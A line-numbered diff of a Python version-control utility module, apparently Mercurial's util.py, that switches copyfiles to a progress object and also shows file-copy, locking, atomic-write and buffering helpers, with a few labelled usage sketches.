1581 1581 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1582 1582 '''copy a file, preserving mode and optionally other stat info like
1583 1583 atime/mtime
1584 1584
1585 1585 checkambig argument is used with filestat, and is useful only if
1586 1586 destination file is guarded by any lock (e.g. repo.lock or
1587 1587 repo.wlock).
1588 1588
1589 1589 copystat and checkambig should be exclusive.
1590 1590 '''
1591 1591 assert not (copystat and checkambig)
1592 1592 oldstat = None
1593 1593 if os.path.lexists(dest):
1594 1594 if checkambig:
1595 1595 oldstat = checkambig and filestat.frompath(dest)
1596 1596 unlink(dest)
1597 1597 if hardlink:
1598 1598 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1599 1599 # unless we are confident that dest is on a whitelisted filesystem.
1600 1600 try:
1601 1601 fstype = getfstype(os.path.dirname(dest))
1602 1602 except OSError:
1603 1603 fstype = None
1604 1604 if fstype not in _hardlinkfswhitelist:
1605 1605 hardlink = False
1606 1606 if hardlink:
1607 1607 try:
1608 1608 oslink(src, dest)
1609 1609 return
1610 1610 except (IOError, OSError):
1611 1611 pass # fall back to normal copy
1612 1612 if os.path.islink(src):
1613 1613 os.symlink(os.readlink(src), dest)
1614 1614 # copytime is ignored for symlinks, but in general copytime isn't needed
1615 1615 # for them anyway
1616 1616 else:
1617 1617 try:
1618 1618 shutil.copyfile(src, dest)
1619 1619 if copystat:
1620 1620 # copystat also copies mode
1621 1621 shutil.copystat(src, dest)
1622 1622 else:
1623 1623 shutil.copymode(src, dest)
1624 1624 if oldstat and oldstat.stat:
1625 1625 newstat = filestat.frompath(dest)
1626 1626 if newstat.isambig(oldstat):
1627 1627 # stat of copied file is ambiguous to original one
1628 1628 advanced = (
1629 1629 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1630 1630 os.utime(dest, (advanced, advanced))
1631 1631 except shutil.Error as inst:
1632 1632 raise error.Abort(str(inst))
1633 1633
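# Usage sketch (not from the original source): copying a single file, either
# by hardlinking on a whitelisted filesystem or by a real copy that preserves
# stat info. 'srcpath' and 'dstpath' are hypothetical.
#
#     copyfile(srcpath, dstpath, hardlink=True)    # link if on a safe fs
#     copyfile(srcpath, dstpath, copystat=True)    # real copy + atime/mtime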
1634 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1634 def copyfiles(src, dst, hardlink=None, progress=None):
1635 1635 """Copy a directory tree using hardlinks if possible."""
1636 1636 num = 0
1637 1637
1638 gettopic = lambda: hardlink and _('linking') or _('copying')
1638 def settopic():
1639 if progress:
1640 progress.topic = _('linking') if hardlink else _('copying')
1639 1641
1640 1642 if os.path.isdir(src):
1641 1643 if hardlink is None:
1642 1644 hardlink = (os.stat(src).st_dev ==
1643 1645 os.stat(os.path.dirname(dst)).st_dev)
1644 topic = gettopic()
1646 settopic()
1645 1647 os.mkdir(dst)
1646 1648 for name, kind in listdir(src):
1647 1649 srcname = os.path.join(src, name)
1648 1650 dstname = os.path.join(dst, name)
1649 def nprog(t, pos):
1650 if pos is not None:
1651 return progress(t, pos + num)
1652 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1651 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1653 1652 num += n
1654 1653 else:
1655 1654 if hardlink is None:
1656 1655 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1657 1656 os.stat(os.path.dirname(dst)).st_dev)
1658 topic = gettopic()
1657 settopic()
1659 1658
1660 1659 if hardlink:
1661 1660 try:
1662 1661 oslink(src, dst)
1663 1662 except (IOError, OSError):
1664 1663 hardlink = False
1665 1664 shutil.copy(src, dst)
1666 1665 else:
1667 1666 shutil.copy(src, dst)
1668 1667 num += 1
1669 progress(topic, num)
1670 progress(topic, None)
1668 if progress:
1669 progress.increment()
1671 1670
1672 1671 return hardlink, num
1673 1672
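# Usage sketch (assumption, not from the original source): with the change
# above, copyfiles() takes an optional progress helper object exposing a
# 'topic' attribute and an increment() method instead of a callback. Assuming
# a ui progress helper roughly like the one copystore uses:
#
#     progress = ui.makeprogress(_('copying'), unit=_('files'))  # assumed API
#     hardlink, num = copyfiles(srcpath, dstpath, hardlink=None,
#                               progress=progress)
#     progress.complete()     # assumed finalizer on the helper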
1674 1673 _winreservednames = {
1675 1674 'con', 'prn', 'aux', 'nul',
1676 1675 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1677 1676 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1678 1677 }
1679 1678 _winreservedchars = ':*?"<>|'
1680 1679 def checkwinfilename(path):
1681 1680 r'''Check that the base-relative path is a valid filename on Windows.
1682 1681 Returns None if the path is ok, or a UI string describing the problem.
1683 1682
1684 1683 >>> checkwinfilename(b"just/a/normal/path")
1685 1684 >>> checkwinfilename(b"foo/bar/con.xml")
1686 1685 "filename contains 'con', which is reserved on Windows"
1687 1686 >>> checkwinfilename(b"foo/con.xml/bar")
1688 1687 "filename contains 'con', which is reserved on Windows"
1689 1688 >>> checkwinfilename(b"foo/bar/xml.con")
1690 1689 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1691 1690 "filename contains 'AUX', which is reserved on Windows"
1692 1691 >>> checkwinfilename(b"foo/bar/bla:.txt")
1693 1692 "filename contains ':', which is reserved on Windows"
1694 1693 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1695 1694 "filename contains '\\x07', which is invalid on Windows"
1696 1695 >>> checkwinfilename(b"foo/bar/bla ")
1697 1696 "filename ends with ' ', which is not allowed on Windows"
1698 1697 >>> checkwinfilename(b"../bar")
1699 1698 >>> checkwinfilename(b"foo\\")
1700 1699 "filename ends with '\\', which is invalid on Windows"
1701 1700 >>> checkwinfilename(b"foo\\/bar")
1702 1701 "directory name ends with '\\', which is invalid on Windows"
1703 1702 '''
1704 1703 if path.endswith('\\'):
1705 1704 return _("filename ends with '\\', which is invalid on Windows")
1706 1705 if '\\/' in path:
1707 1706 return _("directory name ends with '\\', which is invalid on Windows")
1708 1707 for n in path.replace('\\', '/').split('/'):
1709 1708 if not n:
1710 1709 continue
1711 1710 for c in _filenamebytestr(n):
1712 1711 if c in _winreservedchars:
1713 1712 return _("filename contains '%s', which is reserved "
1714 1713 "on Windows") % c
1715 1714 if ord(c) <= 31:
1716 1715 return _("filename contains '%s', which is invalid "
1717 1716 "on Windows") % stringutil.escapestr(c)
1718 1717 base = n.split('.')[0]
1719 1718 if base and base.lower() in _winreservednames:
1720 1719 return _("filename contains '%s', which is reserved "
1721 1720 "on Windows") % base
1722 1721 t = n[-1:]
1723 1722 if t in '. ' and n not in '..':
1724 1723 return _("filename ends with '%s', which is not allowed "
1725 1724 "on Windows") % t
1726 1725
1727 1726 if pycompat.iswindows:
1728 1727 checkosfilename = checkwinfilename
1729 1728 timer = time.clock
1730 1729 else:
1731 1730 checkosfilename = platform.checkosfilename
1732 1731 timer = time.time
1733 1732
1734 1733 if safehasattr(time, "perf_counter"):
1735 1734 timer = time.perf_counter
1736 1735
1737 1736 def makelock(info, pathname):
1738 1737 """Create a lock file atomically if possible
1739 1738
1740 1739 This may leave a stale lock file if symlink isn't supported and signal
1741 1740 interrupt is enabled.
1742 1741 """
1743 1742 try:
1744 1743 return os.symlink(info, pathname)
1745 1744 except OSError as why:
1746 1745 if why.errno == errno.EEXIST:
1747 1746 raise
1748 1747 except AttributeError: # no symlink in os
1749 1748 pass
1750 1749
1751 1750 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1752 1751 ld = os.open(pathname, flags)
1753 1752 os.write(ld, info)
1754 1753 os.close(ld)
1755 1754
1756 1755 def readlock(pathname):
1757 1756 try:
1758 1757 return os.readlink(pathname)
1759 1758 except OSError as why:
1760 1759 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1761 1760 raise
1762 1761 except AttributeError: # no symlink in os
1763 1762 pass
1764 1763 fp = posixfile(pathname, 'rb')
1765 1764 r = fp.read()
1766 1765 fp.close()
1767 1766 return r
1768 1767
1769 1768 def fstat(fp):
1770 1769 '''stat file object that may not have fileno method.'''
1771 1770 try:
1772 1771 return os.fstat(fp.fileno())
1773 1772 except AttributeError:
1774 1773 return os.stat(fp.name)
1775 1774
1776 1775 # File system features
1777 1776
1778 1777 def fscasesensitive(path):
1779 1778 """
1780 1779 Return true if the given path is on a case-sensitive filesystem
1781 1780
1782 1781 Requires a path (like /foo/.hg) ending with a foldable final
1783 1782 directory component.
1784 1783 """
1785 1784 s1 = os.lstat(path)
1786 1785 d, b = os.path.split(path)
1787 1786 b2 = b.upper()
1788 1787 if b == b2:
1789 1788 b2 = b.lower()
1790 1789 if b == b2:
1791 1790 return True # no evidence against case sensitivity
1792 1791 p2 = os.path.join(d, b2)
1793 1792 try:
1794 1793 s2 = os.lstat(p2)
1795 1794 if s2 == s1:
1796 1795 return False
1797 1796 return True
1798 1797 except OSError:
1799 1798 return True
1800 1799
1801 1800 try:
1802 1801 import re2
1803 1802 _re2 = None
1804 1803 except ImportError:
1805 1804 _re2 = False
1806 1805
1807 1806 class _re(object):
1808 1807 def _checkre2(self):
1809 1808 global _re2
1810 1809 try:
1811 1810 # check if match works, see issue3964
1812 1811 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1813 1812 except ImportError:
1814 1813 _re2 = False
1815 1814
1816 1815 def compile(self, pat, flags=0):
1817 1816 '''Compile a regular expression, using re2 if possible
1818 1817
1819 1818 For best performance, use only re2-compatible regexp features. The
1820 1819 only flags from the re module that are re2-compatible are
1821 1820 IGNORECASE and MULTILINE.'''
1822 1821 if _re2 is None:
1823 1822 self._checkre2()
1824 1823 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1825 1824 if flags & remod.IGNORECASE:
1826 1825 pat = '(?i)' + pat
1827 1826 if flags & remod.MULTILINE:
1828 1827 pat = '(?m)' + pat
1829 1828 try:
1830 1829 return re2.compile(pat)
1831 1830 except re2.error:
1832 1831 pass
1833 1832 return remod.compile(pat, flags)
1834 1833
1835 1834 @propertycache
1836 1835 def escape(self):
1837 1836 '''Return the version of escape corresponding to self.compile.
1838 1837
1839 1838 This is imperfect because whether re2 or re is used for a particular
1840 1839 function depends on the flags, etc, but it's the best we can do.
1841 1840 '''
1842 1841 global _re2
1843 1842 if _re2 is None:
1844 1843 self._checkre2()
1845 1844 if _re2:
1846 1845 return re2.escape
1847 1846 else:
1848 1847 return remod.escape
1849 1848
1850 1849 re = _re()
1851 1850
1852 1851 _fspathcache = {}
1853 1852 def fspath(name, root):
1854 1853 '''Get name in the case stored in the filesystem
1855 1854
1856 1855 The name should be relative to root, and be normcase-ed for efficiency.
1857 1856
1858 1857 Note that this function is unnecessary, and should not be
1859 1858 called, for case-sensitive filesystems (simply because it's expensive).
1860 1859
1861 1860 The root should be normcase-ed, too.
1862 1861 '''
1863 1862 def _makefspathcacheentry(dir):
1864 1863 return dict((normcase(n), n) for n in os.listdir(dir))
1865 1864
1866 1865 seps = pycompat.ossep
1867 1866 if pycompat.osaltsep:
1868 1867 seps = seps + pycompat.osaltsep
1869 1868 # Protect backslashes. This gets silly very quickly.
1870 1869 seps.replace('\\','\\\\')
1871 1870 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1872 1871 dir = os.path.normpath(root)
1873 1872 result = []
1874 1873 for part, sep in pattern.findall(name):
1875 1874 if sep:
1876 1875 result.append(sep)
1877 1876 continue
1878 1877
1879 1878 if dir not in _fspathcache:
1880 1879 _fspathcache[dir] = _makefspathcacheentry(dir)
1881 1880 contents = _fspathcache[dir]
1882 1881
1883 1882 found = contents.get(part)
1884 1883 if not found:
1885 1884 # retry "once per directory" per "dirstate.walk" which
1887 1886 # may take place for each patch of "hg qpush", for example
1887 1886 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1888 1887 found = contents.get(part)
1889 1888
1890 1889 result.append(found or part)
1891 1890 dir = os.path.join(dir, part)
1892 1891
1893 1892 return ''.join(result)
1894 1893
1895 1894 def checknlink(testfile):
1896 1895 '''check whether hardlink count reporting works properly'''
1897 1896
1898 1897 # testfile may be open, so we need a separate file for checking to
1899 1898 # work around issue2543 (or testfile may get lost on Samba shares)
1900 1899 f1, f2, fp = None, None, None
1901 1900 try:
1902 1901 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1903 1902 suffix='1~', dir=os.path.dirname(testfile))
1904 1903 os.close(fd)
1905 1904 f2 = '%s2~' % f1[:-2]
1906 1905
1907 1906 oslink(f1, f2)
1908 1907 # nlinks() may behave differently for files on Windows shares if
1909 1908 # the file is open.
1910 1909 fp = posixfile(f2)
1911 1910 return nlinks(f2) > 1
1912 1911 except OSError:
1913 1912 return False
1914 1913 finally:
1915 1914 if fp is not None:
1916 1915 fp.close()
1917 1916 for f in (f1, f2):
1918 1917 try:
1919 1918 if f is not None:
1920 1919 os.unlink(f)
1921 1920 except OSError:
1922 1921 pass
1923 1922
1924 1923 def endswithsep(path):
1925 1924 '''Check path ends with os.sep or os.altsep.'''
1926 1925 return (path.endswith(pycompat.ossep)
1927 1926 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1928 1927
1929 1928 def splitpath(path):
1930 1929 '''Split path by os.sep.
1931 1930 Note that this function does not use os.altsep because this is
1932 1931 an alternative of simple "xxx.split(os.sep)".
1933 1932 It is recommended to use os.path.normpath() before using this
1935 1934 function if needed.'''
1935 1934 return path.split(pycompat.ossep)
1936 1935
1937 1936 def mktempcopy(name, emptyok=False, createmode=None):
1938 1937 """Create a temporary file with the same contents from name
1939 1938
1940 1939 The permission bits are copied from the original file.
1941 1940
1942 1941 If the temporary file is going to be truncated immediately, you
1943 1942 can use emptyok=True as an optimization.
1944 1943
1945 1944 Returns the name of the temporary file.
1946 1945 """
1947 1946 d, fn = os.path.split(name)
1948 1947 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1949 1948 os.close(fd)
1950 1949 # Temporary files are created with mode 0600, which is usually not
1951 1950 # what we want. If the original file already exists, just copy
1952 1951 # its mode. Otherwise, manually obey umask.
1953 1952 copymode(name, temp, createmode)
1954 1953 if emptyok:
1955 1954 return temp
1956 1955 try:
1957 1956 try:
1958 1957 ifp = posixfile(name, "rb")
1959 1958 except IOError as inst:
1960 1959 if inst.errno == errno.ENOENT:
1961 1960 return temp
1962 1961 if not getattr(inst, 'filename', None):
1963 1962 inst.filename = name
1964 1963 raise
1965 1964 ofp = posixfile(temp, "wb")
1966 1965 for chunk in filechunkiter(ifp):
1967 1966 ofp.write(chunk)
1968 1967 ifp.close()
1969 1968 ofp.close()
1970 1969 except: # re-raises
1971 1970 try:
1972 1971 os.unlink(temp)
1973 1972 except OSError:
1974 1973 pass
1975 1974 raise
1976 1975 return temp
1977 1976
1978 1977 class filestat(object):
1979 1978 """help to exactly detect change of a file
1980 1979
1981 1980 'stat' attribute is result of 'os.stat()' if specified 'path'
1982 1981 exists. Otherwise, it is None. This can avoid preparative
1983 1982 'exists()' examination on client side of this class.
1984 1983 """
1985 1984 def __init__(self, stat):
1986 1985 self.stat = stat
1987 1986
1988 1987 @classmethod
1989 1988 def frompath(cls, path):
1990 1989 try:
1991 1990 stat = os.stat(path)
1992 1991 except OSError as err:
1993 1992 if err.errno != errno.ENOENT:
1994 1993 raise
1995 1994 stat = None
1996 1995 return cls(stat)
1997 1996
1998 1997 @classmethod
1999 1998 def fromfp(cls, fp):
2000 1999 stat = os.fstat(fp.fileno())
2001 2000 return cls(stat)
2002 2001
2003 2002 __hash__ = object.__hash__
2004 2003
2005 2004 def __eq__(self, old):
2006 2005 try:
2007 2006 # if ambiguity between stat of new and old file is
2008 2007 # avoided, comparison of size, ctime and mtime is enough
2009 2008 # to exactly detect change of a file regardless of platform
2010 2009 return (self.stat.st_size == old.stat.st_size and
2011 2010 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2012 2011 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2013 2012 except AttributeError:
2014 2013 pass
2015 2014 try:
2016 2015 return self.stat is None and old.stat is None
2017 2016 except AttributeError:
2018 2017 return False
2019 2018
2020 2019 def isambig(self, old):
2021 2020 """Examine whether new (= self) stat is ambiguous against old one
2022 2021
2023 2022 "S[N]" below means stat of a file at N-th change:
2024 2023
2025 2024 - S[n-1].ctime < S[n].ctime: can detect change of a file
2026 2025 - S[n-1].ctime == S[n].ctime
2027 2026 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2028 2027 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2029 2028 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2030 2029 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2031 2030
2032 2031 Case (*2) above means that a file was changed twice or more at
2033 2032 same time in sec (= S[n-1].ctime), and comparison of timestamp
2034 2033 is ambiguous.
2035 2034
2036 2035 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2037 2036 timestamp is ambiguous".
2038 2037
2039 2038 But advancing mtime only in case (*2) doesn't work as
2040 2039 expected, because naturally advanced S[n].mtime in case (*1)
2041 2040 might be equal to manually advanced S[n-1 or earlier].mtime.
2042 2041
2043 2042 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2045 2044 treated as ambiguous regardless of mtime, to avoid overlooking
2046 2045 changes hidden by collisions between such mtimes.
2046 2045
2047 2046 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2048 2047 S[n].mtime", even if size of a file isn't changed.
2049 2048 """
2050 2049 try:
2051 2050 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2052 2051 except AttributeError:
2053 2052 return False
2054 2053
2055 2054 def avoidambig(self, path, old):
2056 2055 """Change file stat of specified path to avoid ambiguity
2057 2056
2058 2057 'old' should be previous filestat of 'path'.
2059 2058
2060 2059 This skips avoiding ambiguity, if a process doesn't have
2061 2060 appropriate privileges for 'path'. This returns False in this
2062 2061 case.
2063 2062
2064 2063 Otherwise, this returns True, as "ambiguity is avoided".
2065 2064 """
2066 2065 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2067 2066 try:
2068 2067 os.utime(path, (advanced, advanced))
2069 2068 except OSError as inst:
2070 2069 if inst.errno == errno.EPERM:
2071 2070 # utime() on the file created by another user causes EPERM,
2072 2071 # if a process doesn't have appropriate privileges
2073 2072 return False
2074 2073 raise
2075 2074 return True
2076 2075
2077 2076 def __ne__(self, other):
2078 2077 return not self == other
2079 2078
2080 2079 class atomictempfile(object):
2081 2080 '''writable file object that atomically updates a file
2082 2081
2083 2082 All writes will go to a temporary copy of the original file. Call
2084 2083 close() when you are done writing, and atomictempfile will rename
2085 2084 the temporary copy to the original name, making the changes
2086 2085 visible. If the object is destroyed without being closed, all your
2087 2086 writes are discarded.
2088 2087
2089 2088 checkambig argument of constructor is used with filestat, and is
2090 2089 useful only if target file is guarded by any lock (e.g. repo.lock
2091 2090 or repo.wlock).
2092 2091 '''
2093 2092 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2094 2093 self.__name = name # permanent name
2095 2094 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2096 2095 createmode=createmode)
2097 2096 self._fp = posixfile(self._tempname, mode)
2098 2097 self._checkambig = checkambig
2099 2098
2100 2099 # delegated methods
2101 2100 self.read = self._fp.read
2102 2101 self.write = self._fp.write
2103 2102 self.seek = self._fp.seek
2104 2103 self.tell = self._fp.tell
2105 2104 self.fileno = self._fp.fileno
2106 2105
2107 2106 def close(self):
2108 2107 if not self._fp.closed:
2109 2108 self._fp.close()
2110 2109 filename = localpath(self.__name)
2111 2110 oldstat = self._checkambig and filestat.frompath(filename)
2112 2111 if oldstat and oldstat.stat:
2113 2112 rename(self._tempname, filename)
2114 2113 newstat = filestat.frompath(filename)
2115 2114 if newstat.isambig(oldstat):
2116 2115 # stat of changed file is ambiguous to original one
2117 2116 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2118 2117 os.utime(filename, (advanced, advanced))
2119 2118 else:
2120 2119 rename(self._tempname, filename)
2121 2120
2122 2121 def discard(self):
2123 2122 if not self._fp.closed:
2124 2123 try:
2125 2124 os.unlink(self._tempname)
2126 2125 except OSError:
2127 2126 pass
2128 2127 self._fp.close()
2129 2128
2130 2129 def __del__(self):
2131 2130 if safehasattr(self, '_fp'): # constructor actually did something
2132 2131 self.discard()
2133 2132
2134 2133 def __enter__(self):
2135 2134 return self
2136 2135
2137 2136 def __exit__(self, exctype, excvalue, traceback):
2138 2137 if exctype is not None:
2139 2138 self.discard()
2140 2139 else:
2141 2140 self.close()
2142 2141
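# Usage sketch (not from the original source): atomictempfile as a context
# manager; the target file is only replaced if the block exits cleanly.
#
#     with atomictempfile(b'data/state', checkambig=True) as fp:
#         fp.write(b'new contents')
#     # on success the temp copy is renamed over 'data/state'; on an
#     # exception it is discarded and the original file is untouched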
2143 2142 def unlinkpath(f, ignoremissing=False):
2144 2143 """unlink and remove the directory if it is empty"""
2145 2144 if ignoremissing:
2146 2145 tryunlink(f)
2147 2146 else:
2148 2147 unlink(f)
2149 2148 # try removing directories that might now be empty
2150 2149 try:
2151 2150 removedirs(os.path.dirname(f))
2152 2151 except OSError:
2153 2152 pass
2154 2153
2155 2154 def tryunlink(f):
2156 2155 """Attempt to remove a file, ignoring ENOENT errors."""
2157 2156 try:
2158 2157 unlink(f)
2159 2158 except OSError as e:
2160 2159 if e.errno != errno.ENOENT:
2161 2160 raise
2162 2161
2163 2162 def makedirs(name, mode=None, notindexed=False):
2164 2163 """recursive directory creation with parent mode inheritance
2165 2164
2166 2165 Newly created directories are marked as "not to be indexed by
2167 2166 the content indexing service", if ``notindexed`` is specified
2168 2167 for "write" mode access.
2169 2168 """
2170 2169 try:
2171 2170 makedir(name, notindexed)
2172 2171 except OSError as err:
2173 2172 if err.errno == errno.EEXIST:
2174 2173 return
2175 2174 if err.errno != errno.ENOENT or not name:
2176 2175 raise
2177 2176 parent = os.path.dirname(os.path.abspath(name))
2178 2177 if parent == name:
2179 2178 raise
2180 2179 makedirs(parent, mode, notindexed)
2181 2180 try:
2182 2181 makedir(name, notindexed)
2183 2182 except OSError as err:
2184 2183 # Catch EEXIST to handle races
2185 2184 if err.errno == errno.EEXIST:
2186 2185 return
2187 2186 raise
2188 2187 if mode is not None:
2189 2188 os.chmod(name, mode)
2190 2189
2191 2190 def readfile(path):
2192 2191 with open(path, 'rb') as fp:
2193 2192 return fp.read()
2194 2193
2195 2194 def writefile(path, text):
2196 2195 with open(path, 'wb') as fp:
2197 2196 fp.write(text)
2198 2197
2199 2198 def appendfile(path, text):
2200 2199 with open(path, 'ab') as fp:
2201 2200 fp.write(text)
2202 2201
2203 2202 class chunkbuffer(object):
2204 2203 """Allow arbitrary sized chunks of data to be efficiently read from an
2205 2204 iterator over chunks of arbitrary size."""
2206 2205
2207 2206 def __init__(self, in_iter):
2208 2207 """in_iter is the iterator that's iterating over the input chunks."""
2209 2208 def splitbig(chunks):
2210 2209 for chunk in chunks:
2211 2210 if len(chunk) > 2**20:
2212 2211 pos = 0
2213 2212 while pos < len(chunk):
2214 2213 end = pos + 2 ** 18
2215 2214 yield chunk[pos:end]
2216 2215 pos = end
2217 2216 else:
2218 2217 yield chunk
2219 2218 self.iter = splitbig(in_iter)
2220 2219 self._queue = collections.deque()
2221 2220 self._chunkoffset = 0
2222 2221
2223 2222 def read(self, l=None):
2224 2223 """Read L bytes of data from the iterator of chunks of data.
2225 2224 Returns less than L bytes if the iterator runs dry.
2226 2225
2227 2226 If size parameter is omitted, read everything"""
2228 2227 if l is None:
2229 2228 return ''.join(self.iter)
2230 2229
2231 2230 left = l
2232 2231 buf = []
2233 2232 queue = self._queue
2234 2233 while left > 0:
2235 2234 # refill the queue
2236 2235 if not queue:
2237 2236 target = 2**18
2238 2237 for chunk in self.iter:
2239 2238 queue.append(chunk)
2240 2239 target -= len(chunk)
2241 2240 if target <= 0:
2242 2241 break
2243 2242 if not queue:
2244 2243 break
2245 2244
2246 2245 # The easy way to do this would be to queue.popleft(), modify the
2247 2246 # chunk (if necessary), then queue.appendleft(). However, for cases
2248 2247 # where we read partial chunk content, this incurs 2 dequeue
2249 2248 # mutations and creates a new str for the remaining chunk in the
2250 2249 # queue. Our code below avoids this overhead.
2251 2250
2252 2251 chunk = queue[0]
2253 2252 chunkl = len(chunk)
2254 2253 offset = self._chunkoffset
2255 2254
2256 2255 # Use full chunk.
2257 2256 if offset == 0 and left >= chunkl:
2258 2257 left -= chunkl
2259 2258 queue.popleft()
2260 2259 buf.append(chunk)
2261 2260 # self._chunkoffset remains at 0.
2262 2261 continue
2263 2262
2264 2263 chunkremaining = chunkl - offset
2265 2264
2266 2265 # Use all of unconsumed part of chunk.
2267 2266 if left >= chunkremaining:
2268 2267 left -= chunkremaining
2269 2268 queue.popleft()
2270 2269 # offset == 0 is enabled by block above, so this won't merely
2271 2270 # copy via ``chunk[0:]``.
2272 2271 buf.append(chunk[offset:])
2273 2272 self._chunkoffset = 0
2274 2273
2275 2274 # Partial chunk needed.
2276 2275 else:
2277 2276 buf.append(chunk[offset:offset + left])
2278 2277 self._chunkoffset += left
2279 2278 left -= chunkremaining
2280 2279
2281 2280 return ''.join(buf)
2282 2281
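# Editor's note: illustrative sketch only. It shows the read() contract described
# above: fixed-size reads may span input chunk boundaries, and the last read
# simply returns fewer bytes once the underlying iterator runs dry.
buf = chunkbuffer(iter([b'abc', b'defgh', b'ij']))
assert buf.read(4) == b'abcd'   # spans the first two input chunks
assert buf.read(4) == b'efgh'   # drains the partially consumed second chunk
assert buf.read(4) == b'ij'     # iterator exhausted, a short read is returned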
2283 2282 def filechunkiter(f, size=131072, limit=None):
2284 2283 """Create a generator that produces the data in the file size
2285 2284 (default 131072) bytes at a time, up to optional limit (default is
2286 2285 to read all data). Chunks may be less than size bytes if the
2287 2286 chunk is the last chunk in the file, or the file is a socket or
2288 2287 some other type of file that sometimes reads less data than is
2289 2288 requested."""
2290 2289 assert size >= 0
2291 2290 assert limit is None or limit >= 0
2292 2291 while True:
2293 2292 if limit is None:
2294 2293 nbytes = size
2295 2294 else:
2296 2295 nbytes = min(limit, size)
2297 2296 s = nbytes and f.read(nbytes)
2298 2297 if not s:
2299 2298 break
2300 2299 if limit:
2301 2300 limit -= len(s)
2302 2301 yield s
2303 2302
2304 2303 class cappedreader(object):
2305 2304 """A file object proxy that allows reading up to N bytes.
2306 2305
2307 2306 Given a source file object, instances of this type allow reading up to
2308 2307 N bytes from that source file object. Attempts to read past the allowed
2309 2308 limit are treated as EOF.
2310 2309
2311 2310 It is assumed that I/O is not performed on the original file object
2312 2311 in addition to I/O that is performed by this instance. If there is,
2313 2312 state tracking will get out of sync and unexpected results will ensue.
2314 2313 """
2315 2314 def __init__(self, fh, limit):
2316 2315 """Allow reading up to <limit> bytes from <fh>."""
2317 2316 self._fh = fh
2318 2317 self._left = limit
2319 2318
2320 2319 def read(self, n=-1):
2321 2320 if not self._left:
2322 2321 return b''
2323 2322
2324 2323 if n < 0:
2325 2324 n = self._left
2326 2325
2327 2326 data = self._fh.read(min(n, self._left))
2328 2327 self._left -= len(data)
2329 2328 assert self._left >= 0
2330 2329
2331 2330 return data
2332 2331
2333 2332 def readinto(self, b):
2334 2333 res = self.read(len(b))
2335 2334 if res is None:
2336 2335 return None
2337 2336
2338 2337 b[0:len(res)] = res
2339 2338 return len(res)
2340 2339
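# Editor's note: illustrative sketch only; io.BytesIO stands in for any file
# object handed to cappedreader.
import io

capped = cappedreader(io.BytesIO(b'0123456789'), 5)
assert capped.read() == b'01234'   # omitted/negative n reads up to the limit
assert capped.read(3) == b''       # limit exhausted, behaves like EOF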
2341 2340 def unitcountfn(*unittable):
2342 2341 '''return a function that renders a readable count of some quantity'''
2343 2342
2344 2343 def go(count):
2345 2344 for multiplier, divisor, format in unittable:
2346 2345 if abs(count) >= divisor * multiplier:
2347 2346 return format % (count / float(divisor))
2348 2347 return unittable[-1][2] % count
2349 2348
2350 2349 return go
2351 2350
2352 2351 def processlinerange(fromline, toline):
2353 2352 """Check that linerange <fromline>:<toline> makes sense and return a
2354 2353 0-based range.
2355 2354
2356 2355 >>> processlinerange(10, 20)
2357 2356 (9, 20)
2358 2357 >>> processlinerange(2, 1)
2359 2358 Traceback (most recent call last):
2360 2359 ...
2361 2360 ParseError: line range must be positive
2362 2361 >>> processlinerange(0, 5)
2363 2362 Traceback (most recent call last):
2364 2363 ...
2365 2364 ParseError: fromline must be strictly positive
2366 2365 """
2367 2366 if toline - fromline < 0:
2368 2367 raise error.ParseError(_("line range must be positive"))
2369 2368 if fromline < 1:
2370 2369 raise error.ParseError(_("fromline must be strictly positive"))
2371 2370 return fromline - 1, toline
2372 2371
2373 2372 bytecount = unitcountfn(
2374 2373 (100, 1 << 30, _('%.0f GB')),
2375 2374 (10, 1 << 30, _('%.1f GB')),
2376 2375 (1, 1 << 30, _('%.2f GB')),
2377 2376 (100, 1 << 20, _('%.0f MB')),
2378 2377 (10, 1 << 20, _('%.1f MB')),
2379 2378 (1, 1 << 20, _('%.2f MB')),
2380 2379 (100, 1 << 10, _('%.0f KB')),
2381 2380 (10, 1 << 10, _('%.1f KB')),
2382 2381 (1, 1 << 10, _('%.2f KB')),
2383 2382 (1, 1, _('%.0f bytes')),
2384 2383 )
2385 2384
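# Editor's note: illustrative sketch only, assuming untranslated (C locale)
# messages. bytecount() picks the first row of the table above whose threshold
# the value reaches, which controls how many decimals are shown.
assert bytecount(500) == '500 bytes'
assert bytecount(2048) == '2.00 KB'       # 1 KB <= value < 10 KB: two decimals
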